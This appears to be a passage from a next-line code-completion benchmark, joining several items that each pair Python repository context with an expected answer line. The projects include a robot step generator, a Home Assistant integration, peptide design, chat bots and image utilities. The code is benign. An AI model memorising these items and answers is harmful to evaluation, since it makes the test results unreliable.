self.state_current_ts + 1 >= self.ts_per_step: self.ts_per_step = ts_per_step # step duration in time steps self.swing_height = z_span self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints self.switch = True #-------------------------- Distinguish active leg if self.state_is_left_active: return y0+y_swing, active_z_swing+z0, -y0+y_swing, z0 else: return y0-y_swing, z0, -y0-y_swing, active_z_swing+z0 # Path: behaviors/custom/Step/Step.py from agent.Base_Agent import Base_Agent from behaviors.custom.Step.Step_Generator import Step_Generator import numpy as np class Step(): def __init__(self, base_agent : Base_Agent) -> None: self.world = base_agent.world self.ik = base_agent.inv_kinematics self.description = "Step (Skill-Set-Primitive)" self.auto_head = True nao_specs = self.ik.NAO_SPECS self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height feet_y_dev = nao_specs[0] * 1.2 # wider step sample_time = self.world.robot.STEPTIME max_ankle_z = nao_specs[5] # Initialize step generator with constants
self.step_generator = Step_Generator(feet_y_dev, sample_time, max_ankle_z)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: koenhendriks/ha-button-plus # Path: custom_components/button_plus/button_plus_api/local_api_client.py class LocalApiClient: """ Client to talk to Button+ local devices """ def __init__(self, ip_address, session) -> None: self._base = f"http://{ip_address}" self._session = session _LOGGER.debug(f"Initialize Button+ local API client") async def fetch_config(self): url = f"{self._base}/config" _LOGGER.debug(f"fetch_config {url}") async with self._session.get(url) as response: return await response.text() async def push_config(self, config): url = f"{self._base}/configsave" _LOGGER.debug(f"push_config {url}") async with self._session.post(url, data=config.to_json()) as response: return await response.text() # Path: custom_components/button_plus/button_plus_api/model.py class DeviceConfiguration: def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay], mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]): self.info = info self.core = core self.mqtt_buttons = mqtt_buttons self.mqtt_displays = mqtt_displays self.mqtt_brokers = mqtt_brokers self.mqtt_sensors = mqtt_sensors @staticmethod def from_json(json_data: str) -> 'DeviceConfiguration': data = json.loads(json_data) return DeviceConfiguration( info=Info.from_dict(data['info']), core=Core.from_dict(data['core']), mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']], mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']], mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']], mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']], ) def to_json(self) -> str: def serialize(obj): if hasattr(obj, '__dict__'): d = obj.__dict__.copy() # Convert the root keys if isinstance(obj, DeviceConfiguration): d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')] d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')] d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')] d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')] if isinstance(obj, Info): d['id'] = d.pop('device_id') d['ipaddress'] = d.pop('ip_address') d['largedisplay'] = d.pop('large_display') elif isinstance(obj, Connector): d['id'] = d.pop('connector_id') d['type'] = d.pop('connector_type') elif isinstance(obj, Sensor): d['sensorid'] = d.pop('sensor_id') elif isinstance(obj, Core): d['autobackup'] = d.pop('auto_backup') d['brightnesslargedisplay'] = d.pop('brightness_large_display') d['brightnessminidisplay'] = d.pop('brightness_mini_display') d['ledcolorfront'] = d.pop('led_color_front') d['ledcolorwall'] = d.pop('led_color_wall') # Custom mappings for MqttButton class elif isinstance(obj, MqttButton): d['id'] = d.pop('button_id') d['toplabel'] = d.pop('top_label') d['ledcolorfront'] = d.pop('led_color_front') d['ledcolorwall'] = d.pop('led_color_wall') d['longdelay'] = d.pop('long_delay') d['longrepeat'] = d.pop('long_repeat') elif isinstance(obj, Topic): d['brokerid'] = d.pop('broker_id') d['eventtype'] = d.pop('event_type') elif isinstance(obj, MqttDisplay): d['fontsize'] = d.pop('font_size') d['topics'] = [serialize(topic) for topic in d['topics']] elif isinstance(obj, MqttBroker): d['brokerid'] = d.pop('broker_id') d['wsport'] = d.pop('ws_port') elif isinstance(obj, MqttSensor): d['sensorid'] = d.pop('sensor_id') d['topic'] = serialize(d['topic']) # Filter out None values return {k: v for k, v in d.items() if v is not None} else: return str(obj) return json.dumps(self, default=serialize, indent=4) # Path: custom_components/button_plus/const.py DOMAIN = "button_plus" # Path: custom_components/button_plus/const.py MANUFACTURER = "Button+" # Path: custom_components/button_plus/buttonplushub.py import logging from homeassistant.config_entries import ConfigEntry from homeassistant.helpers import device_registry as dr from .button_plus_api.local_api_client import LocalApiClient from .button_plus_api.model import DeviceConfiguration from homeassistant.core import HomeAssistant from .const import DOMAIN, MANUFACTURER from homeassistant.helpers import aiohttp_client """Button+ connects several devices.""" from __future__ import annotations _LOGGER: logging.Logger = logging.getLogger(__package__) class ButtonPlusHub: """hub for Button+.""" def __init__(self, hass: HomeAssistant, config: DeviceConfiguration, entry: ConfigEntry) -> None: _LOGGER.debug(f"New hub with config {config.core}") self._hass = hass self.config = config self._name = config.core.name self._id = self.config.info.device_id self._client = LocalApiClient(config.info.ip_address, aiohttp_client.async_get_clientsession(hass)) self.online = True self.button_entities = {} self.label_entities = {} self.top_label_entities = {} device_registry = dr.async_get(hass) device_registry.async_get_or_create( configuration_url=f"http://{self.config.info.ip_address}/", config_entry_id=entry.entry_id, connections={(dr.CONNECTION_NETWORK_MAC, self.config.info.mac)},
identifiers={(DOMAIN, self.config.info.device_id)},
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: RosettaCommons/AF2_peptide_hallucination # Path: util/util.py def select_positions(n_mutations, boundcomplex, select_positions, select_position_params): ''' Select mutable positions in the binder based on a specific method. Returns a dictionary of binder with associated array indicating mutable positions. ''' mutable_positions = {} if select_positions == 'random': # Choose positions randomly. mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False) elif select_positions == 'plddt': # Choose positions based on lowest plddt in binder sequence. # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower). mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate. # Get plddts from sequence object (binder) plddts = boundcomplex.current_prediction_results["plddt"] # Take just binder segment plddts = plddts[:boundcomplex.binder_length,] # Weights associated with each position in the binder. # to account for termini systematically scoring worse in pLDDT. weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25]) n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile) potential_sites = np.argsort(plddts)[:n_potential] # Select mutable sites sub_w = weights[potential_sites] sub_w = [w/np.sum(sub_w) for w in sub_w] sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w) mutable_positions['binder'] = sites return mutable_positions # Path: util/util.py def select_positions(n_mutations, boundcomplex, select_positions, select_position_params): def get_aa_freq(AA_freq: dict, exclude_AA: str): def initialize_MCMC(conf): def initialize_score_file(conf) -> None: def append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None: def accept_or_reject(boundcomplex, T, step): def write_outputs(boundcomplex, conf, i) -> None: def relabel_chains(pdb_lines): M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate # Path: util/loss.py def compute_loss(conf, boundcomplex): """ Computes losses as defined by the config file """ losses=OrderedDict() for loss_name in conf: loss_function = globals().get(loss_name, None) if loss_function is not None and callable(loss_function): losses[loss_name] = loss_function(boundcomplex) else: raise ValueError(f"Loss function {loss_name} not found") total_loss=combine_loss(losses, conf) return total_loss, losses # Path: run.py import os import sys import numpy as np import hydra import copy from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure from submodules.oligomer_hallucination.modules.mutations import mutate from util.util import select_positions from util import util from util.loss import compute_loss from omegaconf import DictConfig, OmegaConf from hydra.core.hydra_config import HydraConfig class BoundComplex(Protomers, Oligomer): ''' Class for keeping track of binder sequence and complex predictions during binder hallucination. ''' def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None): """ target_sequence: amino acid sequence of target peptide (to bind) length: length of binder peptide binder_sequence: Optional, starting amino acid sequence of the binder aa_freq: dictonary containing the frequencies of each aa """ self.target_seq = target_sequence.upper() assert len(self.target_seq) > 0, "Target sequence must be provided" self.length = int(length) self.aa_freq = aa_freq # Get initial binder sequence if binder_sequence: assert self.length > 0, "Binder length must be greater than 0" self.init_binder_seq = binder_sequence.upper() else: self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values()))) self.binder_length = len(self.init_binder_seq) self.target_length = len(self.target_seq) self.chain_Ls = [self.binder_length, self.target_length] self.init_bound_seq = self.init_binder_seq + self.target_seq self.bound_length = len(self.init_bound_seq) # Initialize current and try sequences, self.current_binder_seq = self.init_binder_seq self.try_binder_seq = self.init_binder_seq self.current_bound_seq = self.init_bound_seq self.try_seq = self.init_bound_seq self.name=name def init_scores(self, scores): '''Initalise scores''' self.init_scores = scores self.current_scores = scores self.try_scores = scores def update_scores(self): '''Update current scores to try scores. ''' self.current_scores = self.try_scores def assign_scores(self, scores): '''Assign try scores. ''' self.try_scores = scores def update_scores(self): '''Update current scores to try scores.''' self.current_scores = copy.deepcopy(self.try_scores) @hydra.main(version_base=None, config_path='config', config_name='base') def main(conf: HydraConfig) -> None: """ Main function for running peptide binder hallucination. """ input_conf=conf.input output_conf=conf.output loss_conf=conf.loss model_conf=conf.model hallucination_conf=conf.hallucination os.makedirs(output_conf.out_dir, exist_ok=True) if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'): sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Cypas/splatoon3-schedule # Path: nonebot_plugin_splatoon3_schedule/utils/dataClass.py class TimeUtil(object): @classmethod def parse_timezone(cls, timezone): """ 解析时区表示 :param timezone: str eg: +8 :return: dict{symbol, offset} """ result = re.match(r"(?P<symbol>[+-])(?P<offset>\d+)", timezone) symbol = result.groupdict()["symbol"] offset = int(result.groupdict()["offset"]) return {"symbol": symbol, "offset": offset} @classmethod def convert_timezone(cls, dt, timezone="+0") -> datetime.datetime: """默认是utc时间,需要提供时区""" result = cls.parse_timezone(timezone) symbol = result["symbol"] offset = result["offset"] if symbol == "+": return dt + timedelta(hours=offset) elif symbol == "-": return dt - timedelta(hours=offset) else: raise Exception("dont parse timezone format") # Path: nonebot_plugin_splatoon3_schedule/config.py class Config(BaseModel): # Path: nonebot_plugin_splatoon3_schedule/utils/utils.py import datetime import cfscrape import httpx from httpx import Response from .dataClass import TimeUtil from ..config import plugin_config "Ranked Challenge": (227, 68, 17), "Ranked Open": (24, 200, 26), "X Schedule": (14, 205, 147), "打工": (14, 203, 146), "活动": (223, 42, 119), "祭典": (103, 103, 114), "祭典时间-金黄": (234, 255, 61), "上-武器卡片-黄": (234, 255, 61), "下-武器卡片-蓝": (96, 58, 255), "上-武器卡片": (255, 148, 157), "下-武器卡片": (124, 217, 127), "祭典结算项目卡片": (63, 63, 70, 70), } def cf_http_get(url: str): """cf get""" # 实例化一个create_scraper对象 scraper = cfscrape.create_scraper() # 请求报错,可以加上时延 # scraper = cfscrape.create_scraper(delay = 6) if proxy_address: cf_proxies = { "http": "http://{}".format(proxy_address), "https": "http://{}".format(proxy_address), } # 获取网页内容 代理访问 res = scraper.get(url, proxies=cf_proxies) else: # 获取网页内容 res = scraper.get(url) return res async def async_http_get(url: str) -> Response: """async http_get""" async with httpx.AsyncClient(proxies=proxies) as client: response = await client.get(url, timeout=HTTP_TIME_OUT) return response def http_get(url: str) -> Response: """http_get""" response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT) return response def multiple_replace(text, _dict): """批量替换文本""" for key in _dict: text = text.replace(key, _dict[key]) return text def get_expire_time() -> str: """计算过期时间 字符串 精确度为 ymdh""" # 计算过期时间 time_now = get_time_now_china() time_now_h = time_now.hour # 计算过期时间字符串 # 判断当前小时是奇数还是偶数 expire_time: datetime if (time_now_h % 2) == 0: # 偶数 expire_time = time_now + datetime.timedelta(hours=2) else: expire_time = time_now + datetime.timedelta(hours=1) expire_time_str = expire_time.strftime(time_format_ymdh).strip() return expire_time_str def time_converter(time_str) -> datetime: """时间转换 年-月-日 时:分:秒""" # convert time to UTC+8 dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ") dt += datetime.timedelta(hours=8) return dt def time_converter_yd(time_str): """时间转换 月-日""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%m.%d") def time_converter_hm(time_str): """时间转换 时:分""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%H:%M") def time_converter_mdhm(time_str): """时间转换 月-日 时:分""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%m-%d %H:%M") def time_converter_weekday(time_str): """时间转换 周几,如周一""" dt = time_converter(time_str) weekday = dt.weekday() return weekday def get_time_ymd(): """获取年月日""" dt = get_time_now_china().strftime("%Y-%m-%d") return dt def get_time_y() -> int: """获取年""" year = get_time_now_china().year return year def get_time_now_china() -> datetime.datetime: """获取中国所在东八区时间""" # 获取utc时间,然后转东8区时间 utc_now = datetime.datetime.utcnow()
convert_now = TimeUtil.convert_timezone(utc_now, "+8")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Sam-Izdat/tinycio # Path: src/tinycio/fsio/format.py class GraphicsFormat(IntEnum): """ The graphics format of an image file to be saved or loaded. For a list of available options, see :ref:`ref_graphics_formats`. """ UNKNOWN = 1<<0 UINT8 = 1<<1 UINT16 = 1<<2 UINT32 = 1<<3 SFLOAT16 = 1<<4 SFLOAT32 = 1<<5 UNORM8 = 1<<6 UNORM16 = 1<<7 UNORM32 = 1<<8 # Lump together any integer-type values I8 = UINT8 | UNORM8 I16 = UINT16 | UNORM16 I32 = UINT32 | UNORM32 UNORM = UNORM8 | UNORM16 | UNORM32 READABLE = UINT8 | UINT16 | UINT32 | UNORM8 | UNORM16 | UNORM32 | SFLOAT16 | SFLOAT32 WRITABLE_PNG = UINT8 | UINT16 | UNORM8 | UNORM16 WRITABLE_TIF = SFLOAT16 | SFLOAT32 WRITABLE_EXR = SFLOAT16 | SFLOAT32 # Path: src/tinycio/fsio/format.py class ImageFileFormat(IntEnum): # TODO: Needs to be expanded after investigating iio support # NOTE: Not in user API right now, as it doesn't need to be UNKNOWN = 1<<0 PNG = 1<<1 JPG = 1<<2 EXR = 1<<3 TIFF = 1<<4 WEBP = 1<<5 # This is annoying, so let's just... TIF = TIFF JPEG = JPG # Supported bit depth UINT8 = PNG | JPG | WEBP UINT16 = PNG SFLOAT16 = EXR | TIFF SFLOAT32 = EXR | TIFF # Path: src/tinycio/fsio/imagefile.py import torch import numpy as np import typing import os import imageio.v3 as iio from .format import GraphicsFormat, ImageFileFormat def _infer_image_file_format(ext:str) -> ImageFileFormat: ext = ext.strip().lower() if ext == '.png': return ImageFileFormat.PNG elif ext == '.jpg': return ImageFileFormat.JPG elif ext == '.jpeg': return ImageFileFormat.JPG elif ext == '.exr': return ImageFileFormat.EXR elif ext == '.tif': return ImageFileFormat.TIFF elif ext == '.tiff': return ImageFileFormat.TIFF elif ext == '.webp': return ImageFileFormat.WEBP else: return ImageFileFormat.UNKNOWN
def load_image(fp:str, graphics_format:GraphicsFormat=GraphicsFormat.UNKNOWN) -> torch.Tensor:
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Dank-del/stats-bot # Path: stats_bot/db/models.py class Attachment(SQLModel, table=True): id: Optional[int] = Field(default=None, primary_key=True) user_id: int = Field(foreign_key="user.id") group_id: int = Field(foreign_key="group.id") message_id: int = Field() media_type: str timestamp: datetime = Field(default=datetime.utcnow) # Path: stats_bot/db/models.py class Message(SQLModel, table=True): id: Optional[int] = Field(default=None, primary_key=True) user_id: int = Field(foreign_key="user.id") group_id: int = Field(foreign_key="group.id") text: str timestamp: datetime = Field(default=datetime.utcnow) # Path: stats_bot/db/models.py class User(SQLModel, table=True): id: int = Field(primary_key=True) username: Optional[str] = Field(nullable=True) first_name: str last_name: Optional[str] = Field(nullable=True) # Path: stats_bot/db/client.py def load_tables(): # Path: stats_bot/decorators/admin.py def admin(func): """ Decorator that checks if the user is an admin before executing the wrapped function. Args: func (callable): The function to be wrapped. Returns: callable: The wrapped function. """ async def wrapper(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None: member = await update.effective_chat.get_member(update.effective_user.id) if ( member.status is not ChatMemberStatus.ADMINISTRATOR and member.status is not ChatMemberStatus.OWNER ): await update.message.reply_text("You are not an admin") return return await func(update, context) return wrapper # Path: stats_bot/handlers/plot.py import pandas as pd import matplotlib.pyplot as plt import io from sqlmodel import Session, select from telegram import Update from telegram.ext import ( ContextTypes, ) from stats_bot.db.models import Attachment, Message, User from stats_bot.db.client import engine from stats_bot.decorators.admin import admin @admin async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None: """ Generates a table of top 10 users by number of messages and average message length, and plots a bar chart to visualize the data. Args: update (Update): The update object containing information about the incoming message. context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information. Returns: None """ msg = await update.effective_message.reply_text("Generating table...") data = [] # fetch this data from database with Session(engine) as session: # users = session.exec(select(User)).all() messages = session.exec( select(Message).where(Message.group_id == update.effective_chat.id) ).all() # make a list of users, messages of whom are in the messages variable users = [] for message in messages: if message.user_id not in users: users.append(message.user_id) # print(users) for user in users: usr = session.exec(select(User).where(User.id == user)).first() msgs = session.exec( select(Message.text).where(Message.user_id == usr.id) ).all() data.append((usr.username or str(usr.id), msgs)) # Convert data to a pandas DataFrame df = pd.DataFrame(data, columns=["user_id", "messages"]) print(df) df["num_messages"] = df["messages"].apply(len) # Calculate average message length per user df["avg_message_length"] = df["messages"].apply( lambda x: sum(len(message) for message in x) / len(x) ) # Sort users by number of messages and average message length df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False) # Plot top 10 users top_10_users = df.head(10) plt.figure(figsize=(10, 6)) plt.bar( top_10_users["user_id"], top_10_users["num_messages"], color="blue", alpha=0.6, label="Number of Messages", ) plt.xlabel("User ID") plt.ylabel("Number of Messages") plt.title( f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length" ) plt.legend() buf = io.BytesIO() plt.savefig(buf, format="png") buf.seek(0) await msg.delete() await context.bot.send_photo( chat_id=update.effective_chat.id, photo=buf, reply_to_message_id=msg.reply_to_message.message_id, ) @admin async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None: """ Generates a table of top 10 users by number of attachments sent, and plots a bar chart to visualize the data. Args: update (Update): The update object containing information about the incoming message. context (CallbackContext): The context object containing bot-related information. Returns: None """ msg = await update.effective_message.reply_text("Generating attachment stats...") data = [] # fetch this data from database with Session(engine) as session: attachments = session.exec(
select(Attachment).where(Attachment.group_id == update.effective_chat.id)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: EzyGang/py-cachify # Path: py_cachify/backend/clients.py class AsyncWrapper: def __init__(self, cache: MemoryCache) -> None: self._cache = cache async def get(self, name: str, default: Any = None) -> Any: return self._cache.get(name=name, default=default) async def delete(self, *names: str) -> Any: self._cache.delete(*names) async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any: self._cache.set(name=name, value=value, ex=ex) # Path: py_cachify/backend/clients.py class MemoryCache: def __init__(self) -> None: self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {} def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None: self._cache[name] = value, ex and time.time() + ex def get(self, name: str, default: Any = None) -> Any: val, exp_at = self._cache.get(name, (default, None)) if not exp_at or exp_at > time.time(): return val self.delete(name) return default def delete(self, *names: str) -> None: for key in names: if key not in self._cache: continue del self._cache[key] # Path: py_cachify/backend/exceptions.py class CachifyInitError(Exception): pass # Path: py_cachify/backend/types.py class AsyncClient(Protocol): async def get(self, name: str, default: Any = None) -> Any: raise NotImplementedError async def delete(self, *names: str) -> Any: raise NotImplementedError async def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any: raise NotImplementedError # Path: py_cachify/backend/types.py class SyncClient(Protocol): def get(self, name: str, default: Any = None) -> Any: raise NotImplementedError def delete(self, *names: str) -> Any: raise NotImplementedError def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any: raise NotImplementedError # Path: py_cachify/backend/lib.py import pickle from typing import Any, Union from py_cachify.backend.clients import AsyncWrapper, MemoryCache from py_cachify.backend.exceptions import CachifyInitError from py_cachify.backend.types import AsyncClient, SyncClient from __future__ import annotations class Cachify: def __init__(
self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: lldacing/comfyui-easyapi-nodes # Path: easyapi/util.py def tensor_to_pil(image): return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8)) # Path: easyapi/util.py def pil_to_tensor(image): return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0) # Path: easyapi/util.py def base64_to_image(base64_string): # 去除前缀 base64_list = base64_string.split(",", 1) if len(base64_list) == 2: prefix, base64_data = base64_list else: base64_data = base64_list[0] # 从base64字符串中解码图像数据 image_data = base64.b64decode(base64_data) # 创建一个内存流对象 image_stream = io.BytesIO(image_data) # 使用PIL的Image模块打开图像数据 image = Image.open(image_stream) return image # Path: easyapi/util.py def image_to_base64(pli_image, pnginfo=None): # 创建一个BytesIO对象,用于临时存储图像数据 image_data = io.BytesIO() # 将图像保存到BytesIO对象中,格式为PNG pli_image.save(image_data, format='PNG', pnginfo=pnginfo) # 将BytesIO对象的内容转换为字节串 image_data_bytes = image_data.getvalue() # 将图像数据编码为Base64字符串 encoded_image = "data:image/png;base64," + base64.b64encode(image_data_bytes).decode('utf-8') return encoded_image # Path: easyapi/util.py def read_image_from_url(image_url): response = requests.get(image_url) img = Image.open(io.BytesIO(response.content)) return img # Path: easyapi/ImageNode.py import base64 import copy import io import numpy as np import torch import json from PIL import ImageOps, Image from nodes import LoadImage from comfy.cli_args import args from PIL.PngImagePlugin import PngInfo from json import JSONEncoder, JSONDecoder from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url class LoadImageFromURL: """ 从远程地址读取图片 """ @classmethod def INPUT_TYPES(self): return {"required": { "urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}), }, } RETURN_TYPES = ("IMAGE", "MASK") RETURN_NAMES = ("images", "masks") FUNCTION = "convert" CATEGORY = "EasyApi/Image" # INPUT_IS_LIST = False OUTPUT_IS_LIST = (True, True,) def convert(self, urls): urls = urls.splitlines() images = [] masks = [] for url in urls: if not url.strip().isspace(): i = read_image_from_url(url.strip()) i = ImageOps.exif_transpose(i) image = i.convert("RGB") image = pil_to_tensor(image) images.append(image) if 'A' in i.getbands(): mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0 mask = 1. - torch.from_numpy(mask) else: mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu") masks.append(mask) return (images, masks, ) class LoadMaskFromURL: """ 从远程地址读取图片 """ _color_channels = ["red", "green", "blue", "alpha"] @classmethod def INPUT_TYPES(self): return { "required": { "urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}), "channel": (self._color_channels, {"default": self._color_channels[0]}), }, } RETURN_TYPES = ("MASK", ) RETURN_NAMES = ("masks", ) FUNCTION = "convert" CATEGORY = "EasyApi/Image" # INPUT_IS_LIST = False OUTPUT_IS_LIST = (True, True,) def convert(self, urls, channel=_color_channels[0]): urls = urls.splitlines() masks = [] for url in urls: if not url.strip().isspace(): i = read_image_from_url(url.strip()) # 下面代码参考LoadImage i = ImageOps.exif_transpose(i) if i.getbands() != ("R", "G", "B", "A"): i = i.convert("RGBA") c = channel[0].upper() if c in i.getbands(): mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0 mask = torch.from_numpy(mask) if c == 'A': mask = 1. - mask else: mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu") masks.append(mask) return (masks,) class Base64ToImage: """ 图片的base64格式还原成图片的张量 """ @classmethod def INPUT_TYPES(self): return {"required": { "base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}), }, } RETURN_TYPES = ("IMAGE", "MASK") # RETURN_NAMES = ("image", "mask") FUNCTION = "convert" CATEGORY = "EasyApi/Image" # INPUT_IS_LIST = False OUTPUT_IS_LIST = (True, True) def convert(self, base64Images): # print(base64Image) base64ImageJson = JSONDecoder().decode(s=base64Images) images = [] masks = [] for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: bersegosx/passosh # Path: src/passosh/fields.py class HeaderField: """ An object that represents the fields that display information at the top of a pass. """ key: str value: str label: str = '' textAlignment: str = TextAlignment.NATURAL changeMessage: str = '' # Path: src/passosh/fields.py class PrimaryField: """ An object that represents the fields that display the most important information on a pass. """ key: str value: str label: str = '' changeMessage: str = '' # Path: src/passosh/fields.py class SecondaryField: """ An object that represents the fields that display supporting information on the front of a pass. """ key: str value: str label: str = '' textAlignment: str = TextAlignment.NATURAL changeMessage: str = '' # Path: src/passosh/fields.py class BackField: """ An object that represents the fields that display information on the back of a pass. """ key: str value: str label: str = '' textAlignment: str = TextAlignment.LEFT changeMessage: str = '' # Path: src/passosh/fields.py class AuxiliaryField: """ An object that represents the fields that display additional information on the front of a pass. """ key: str value: str label: str = '' textAlignment: str = TextAlignment.NATURAL changeMessage: str = '' row: int = 0 # Path: src/passosh/fields.py class Barcode: message: str format: BarcodeFormat messageEncoding: str = 'iso-8859-1' altText: str = '' # isn’t displayed for watchOS # Path: src/passosh/fields.py class BoardingPassTransitType(str, Enum): GENERIC = 'PKTransitTypeGeneric' AIR = 'PKTransitTypeAir' BOAT = 'PKTransitTypeBoat' BUS = 'PKTransitTypeBus' TRAIN = 'PKTransitTypeTrain' # Path: src/passosh/fields.py class Location: """ An object that represents a location that the system uses to show a relevant pass. """ latitude: float # in degrees, of the location longitude: float # in degrees, of the location altitude: float | None = None # in meters, of the location # the text to display on the lock screen when the pass is relevant. # For example, a description of a nearby location, such as “Store nearby on 1st and Main”. relevantText: str | None = None # Path: src/passosh/pesso.py from dataclasses import dataclass from .fields import (HeaderField, PrimaryField, SecondaryField, BackField, AuxiliaryField, Barcode, BoardingPassTransitType, Location) @dataclass class Content: """ An object that represents the groups of fields that display the information for an event ticket. """ headerFields: list[HeaderField] | None = None primaryFields: list[PrimaryField] | None = None
secondaryFields: list[SecondaryField] | None = None
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: jonghwanhyeon/python-chzzk # Path: chzzk/client.py class ChzzkClient(HTTPClient): BASE_URL = "https://api.chzzk.naver.com/" def __init__(self, credential: Optional[Credential] = None): super().__init__(credential) # Path: chzzk/client.py class Credential: auth: str session: str def as_cookie(self) -> dict[str, str]: return { "NID_AUT": self.auth, "NID_SES": self.session, } # Path: chzzk/client.py class GameClient(HTTPClient): BASE_URL = "https://comm-api.game.naver.com/nng_main/" def __init__(self, credential: Optional[Credential] = None): super().__init__(credential) # Path: chzzk/models.py class Channel(PartialChannel): channel_type: Optional[str] = None channel_description: str follower_count: int open_live: bool # Path: chzzk/models.py class ChannelSearchRecord(SearchRecord): channel: Channel # Path: chzzk/models.py class LiveDetail(Live): status: str close_date: Optional[Annotated[datetime, AfterValidator(to_kst)]] = None chat_active: bool chat_available_group: str paid_promotion: bool chat_available_condition: str min_follower_minute: int channel: PartialChannel live_polling_status: Json[LivePollingStatus] = Field(alias="livePollingStatusJson") # Path: chzzk/models.py class LiveSearchRecord(SearchRecord): live: Live channel: PartialChannel # Path: chzzk/models.py class LiveStatus(RawModel): live_title: str status: str concurrent_user_count: int accumulate_count: int paid_promotion: bool adult: bool chat_channel_id: str category_type: Optional[str] = None live_category: Optional[str] = None live_category_value: str live_polling_status: Json[LivePollingStatus] = Field(alias="livePollingStatusJson") fault_status: Any # Path: chzzk/models.py class SearchCursor(RawModel, Generic[T]): size: int page: Optional[Page] = None data: list[T] # Path: chzzk/models.py class User(RawModel): has_profile: bool user_id_hash: Optional[str] = None nickname: Optional[str] = None profile_image_url: Optional[str] = None penalties: Optional[list[Any]] = None official_noti_agree: bool official_noti_agree_updated_date: 